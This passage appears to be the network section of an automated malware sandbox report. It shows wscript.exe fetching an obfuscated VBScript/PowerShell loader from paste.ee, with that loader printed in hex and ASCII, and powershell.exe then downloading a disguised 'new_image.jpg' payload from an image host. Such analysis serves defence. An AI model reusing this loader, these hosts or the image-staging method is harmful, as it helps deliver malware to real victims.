Feb 14, 2024 09:08:18.419626951 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.419635057 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.419656038 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.419698000 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.419698954 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.419740915 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.419748068 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.419785023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.419826031 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.420412064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.420449972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.420483112 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.420489073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.420527935 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.420557022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.420581102 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.420622110 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.420650959 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.420655966 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.420698881 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.420727015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422266006 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422305107 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422348976 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422360897 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422391891 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422411919 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422413111 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422431946 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422475100 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422482014 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422519922 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422525883 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422568083 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422810078 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422852039 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422874928 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422879934 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.422924995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422949076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.422966957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.423002958 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.423024893 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.423028946 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.423068047 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.423409939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.423448086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.423480034 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.423485994 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.423517942 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.423600912 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.423654079 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.425714970 CET	49712	443	192.168.2.5	172.67.215.45

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2024 09:07:52.074431896 CET	49967	53	192.168.2.5	1.1.1.1
Feb 14, 2024 09:07:52.194503069 CET	53	49967	1.1.1.1	192.168.2.5
Feb 14, 2024 09:08:16.670363903 CET	62019	53	192.168.2.5	1.1.1.1
Feb 14, 2024 09:08:16.973198891 CET	53	62019	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 14, 2024 09:07:52.074431896 CET	192.168.2.5	1.1.1.1	0x878	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Feb 14, 2024 09:08:16.670363903 CET	192.168.2.5	1.1.1.1	0x852e	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 14, 2024 09:07:52.194503069 CET	1.1.1.1	192.168.2.5	0x878	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Feb 14, 2024 09:07:52.194503069 CET	1.1.1.1	192.168.2.5	0x878	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Feb 14, 2024 09:08:16.973198891 CET	1.1.1.1	192.168.2.5	0x852e	No error (0)	uploaddeimagens.com.br	172.67.215.45	A (IP address)	IN (0x0001)	false
Feb 14, 2024 09:08:16.973198891 CET	1.1.1.1	192.168.2.5	0x852e	No error (0)	uploaddeimagens.com.br	104.21.45.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.84.67	80	2136	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:07:52.319123030 CET	149	OUT	GET /d/wXm0Y HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
Feb 14, 2024 09:07:52.519068956 CET	782	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 14 Feb 2024 08:07:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://paste.ee/d/wXm0Y CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MFYvW6L278YVjRqsmjcjn0yjthulWyXlqFulcDXq2UA4hWXYEP6YOz8GA1l3nF6D4F8LnPKmxZqfFT9K75Ajv3p7XsMtn1sTlafJLefK11Uh%2FZmy3EtlX1NQeg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8553d1e8597ead82-ATL alt-svc: h3=":443"; ma=86400 Data Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Feb 14, 2024 09:07:52.519098043 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	104.21.84.67	443	2136	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-14 08:07:52 UTC	149	OUT	GET /d/wXm0Y HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
2024-02-14 08:07:53 UTC	1236	IN	HTTP/1.1 200 OK Date: Wed, 14 Feb 2024 08:07:53 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i4cvLfetYWu1%2FnduZ2ynJgbk97brdY9WiVWZ1wt16DM%2FodyYFEpkUr21kyEL%2F5CICorn9qKOwo8uexnTdEUBuI4XhfOtjNk6CywAJOEotyPvwH1IWhhjfPGq%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8553d1ec286e3057-ATL alt-svc: h3=":443"; ma=86400
2024-02-14 08:07:53 UTC	133	IN	Data Raw: 33 35 38 63 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 65 73 70 72 61 69 61 64 6f 20 2c 20 72 65 68 61 76 65 72 20 2c 20 70 61 6c 61 64 6f 20 2c 20 74 72 69 62 75 74 65 69 72 6f 20 2c 20 6d 6f 6e 6f 6d 61 71 75 69 61 20 2c 20 43 61 6d 61 20 2c 20 6d 6f 6e 6f 6d 61 71 75 69 61 31 0d 0a 20 20 20 20 20 72 65 68 61 76 65 72 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 70 61 6c 61 64 6f 20 20 3d 20 22 22 20 Data Ascii: 358c dim espraiado , rehaver , palado , tributeiro , monomaquia , Cama , monomaquia1 rehaver = " " palado = ""
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 Data Ascii: & tributeiro & rehaver & tributeiro & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtD
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 61 51 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 47 67 44 67 54 Data Ascii: nDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & tributeiro & rehaver & tributeiro & "gBvDgTreHIDgTre" & tributeiro & rehaver & tributeiro & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgT
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 44 67 54 72 65 44 45 44 67 54 72 65 4c 77 44 67 54 72 65 35 44 67 54 72 65 44 55 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 76 44 67 54 72 65 47 38 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 63 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 45 44 67 54 72 65 62 44 67 54 72 65 44 67 54 72 65 76 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 51 42 33 44 67 54 72 65 46 38 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 77 42 6c 44 67 54 72 65 43 34 44 67 54 72 65 61 67 42 77 44 67 54 72 65 47 63 44 67 54 72 Data Ascii: DgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTre" & tributeiro & rehaver & tributeiro & "QB3DgTreF8DgTreaQBtDgTreGEDgTre" & tributeiro & rehaver & tributeiro & "wBlDgTreC4DgTreagBwDgTreGcDgTr
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 51 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 62 67 42 31 44 67 54 72 65 47 77 44 67 54 72 65 62 44 67 54 72 65 44 67 54 72 65 70 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 65 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 77 42 6c 44 67 54 72 65 46 51 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 51 42 34 44 67 54 72 65 48 51 44 67 54 72 65 49 44 67 54 Data Ascii: & tributeiro & rehaver & tributeiro & "QDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTre" & tributeiro & rehaver & tributeiro & "wBlDgTreFQDgTre" & tributeiro & rehaver & tributeiro & "QB4DgTreHQDgTreIDgT
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 54 72 65 48 67 44 67 54 72 65 64 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 50 44 67 54 72 65 47 59 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 6b 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 Data Ascii: TreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTre" & tributeiro & rehaver & tributeiro & "QBuDgTreGQDgTreSQBuDgTreGQDgTre" & tributeir
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 65 49 44 67 54 72 65 44 67 54 72 65 72 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 64 44 67 54 72 65 42 47 44 67 54 72 65 47 77 44 67 54 72 65 59 51 42 6e 44 67 54 72 65 43 34 44 67 54 72 65 54 44 67 54 72 65 42 6c 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 77 42 30 44 67 54 72 65 47 67 44 67 54 72 65 4f 77 44 67 54 72 65 67 44 67 54 72 65 43 51 44 67 54 72 65 59 67 42 68 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 Data Ascii: eIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTre" & tributeiro & rehaver & tributeiro & "wB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTre" & tributeiro & rehaver & tributeiro
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 44 67 54 72 65 48 59 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 58 51 44 67 54 72 65 36 44 67 54 72 65 44 6f 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 43 44 67 54 72 65 47 45 44 67 54 72 65 63 77 42 6c 44 67 54 72 65 44 59 44 67 54 72 65 4e 44 67 54 72 65 42 54 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 77 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67 54 72 65 59 67 42 68 44 67 54 72 65 48 4d 44 67 54 72 65 22 20 26 20 74 72 69 Data Ascii: DgTreHYDgTre" & tributeiro & rehaver & tributeiro & "QByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTre" & tributeiro & rehaver & tributeiro & "wDgTreoDgTreCQDgTreYgBhDgTreHMDgTre" & tri
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 54 72 65 61 44 67 54 72 65 42 76 44 67 54 72 65 47 51 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 39 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 30 44 67 54 72 65 48 6b 44 67 54 72 65 63 44 67 54 72 65 42 6c 44 67 54 72 65 43 34 44 67 54 72 65 52 77 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 54 51 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 42 76 44 67 54 72 65 47 51 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 46 59 44 67 54 72 65 51 51 42 4a 44 67 54 72 65 43 63 44 67 54 72 65 4b 51 44 67 54 72 65 75 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 32 44 67 54 72 65 47 38 44 67 54 72 65 61 77 42 6c 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 75 44 67 54 72 65 48 55 44 67 54 72 65 Data Ascii: TreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTre
2024-02-14 08:07:53 UTC	1369	IN	Data Raw: 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 63 77 42 68 44 67 54 72 65 47 49 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 51 42 79 44 67 54 72 65 47 6b 44 67 54 72 65 22 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 72 65 68 61 76 65 72 20 26 20 74 72 69 62 75 74 65 69 72 6f 20 26 20 22 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 4f 67 42 7a 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 64 44 67 54 72 65 42 30 44 67 54 72 65 47 67 44 67 54 72 65 4a 77 44 67 54 72 65 67 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 44 45 44 67 54 72 65 4a 77 44 67 54 72 65 67 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 Data Ascii: BzDgTreGUDgTrecwBhDgTreGIDgTre" & tributeiro & rehaver & tributeiro & "QByDgTreGkDgTre" & tributeiro & rehaver & tributeiro & "gDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	172.67.215.45	443	6556	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-14 08:08:17 UTC	124	OUT	GET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-02-14 08:08:17 UTC	701	IN	HTTP/1.1 200 OK Date: Wed, 14 Feb 2024 08:08:17 GMT Content-Type: image/jpeg Content-Length: 8369614 Connection: close Last-Modified: Mon, 05 Feb 2024 14:34:33 GMT ETag: "65c0f1f9-7fb5ce" Cache-Control: max-age=2678400 CF-Cache-Status: HIT Age: 4089 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6z5hozdEiayWf8OEIXhTOMNyeMKWoaG0oW7acOUI%2FLvJXVpVAkdOY220%2FX28IQW3GSwuwICS%2BM8wII8IRUK%2Bxb6tFnY576hpyWADkKR3AD17C%2BH%2BZyjIJC2cuYAWZo1OGyATx56TDZAw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8553d2850ede53af-ATL alt-svc: h3=":443"; ma=86400
2024-02-14 08:08:17 UTC	668	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 39 35 0a ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 Data Ascii: JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95CCp"
2024-02-14 08:08:17 UTC	1369	IN	Data Raw: f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 41 f5 38 14 9b 87 b9 a8 d9 fd f0 29 0b 64 72 4d 7e cf 63 f2 24 bb 92 97 18 e3 83 4c dd 8f ad 33 70 02 90 9a 18 58 90 b1 f5 14 c2 de 99 35 1e ff 00 41 48 ce 7d 7f 2a 2c 57 a0 f2 7d e9 15 88 61 c8 e3 bd 47 bb 3d e9 a1 8e 70 39 a2 c2 d4 99 f0 5b 23 a7 a5 46 7a f5 e3 d2 9a 5b 07 1d 0d 37 7f bd 26 86 3f 75 37 34 9b 85 34 b6 09 e7 22 98 27 7d 81 8f 4e 73 4d 0d c8 19 f7 a0 91 d4 d2 6d 04 f4 a2 e6 97 1c ed 8f ad 30 b7 eb 41 fa e6 9a 7d 28 b8 58 70 6e 3d 68 ce 7d aa 3a 46 7e 28 b8 0f 63 c9 15 19 3e f4 c6 6e 7d e9 03 64 fb d2 b8 c9 0b 63 f9 53 1b bf 3f 85 21 6e 47 a5 04 e4 e7 b5 17 1a 42 83 8f a5 21 7c 1a 42 c7 1d a9 84 93 45 c6 d0 e2 f9 f6 a6 96 18 e0 e6 9a cd e9 4d 0e 57 b7 e9 45 c9 6b b0 f6 6c 53 0b 1c f3 cd 21 Data Ascii: ?A8)drM~c$L3pX5AH}*,W}aG=p9[#Fz[7&?u744"'}NsMm0A}(Xpn=h}:F~(c>n}dcS?!nGB!\|BEMWEklS!
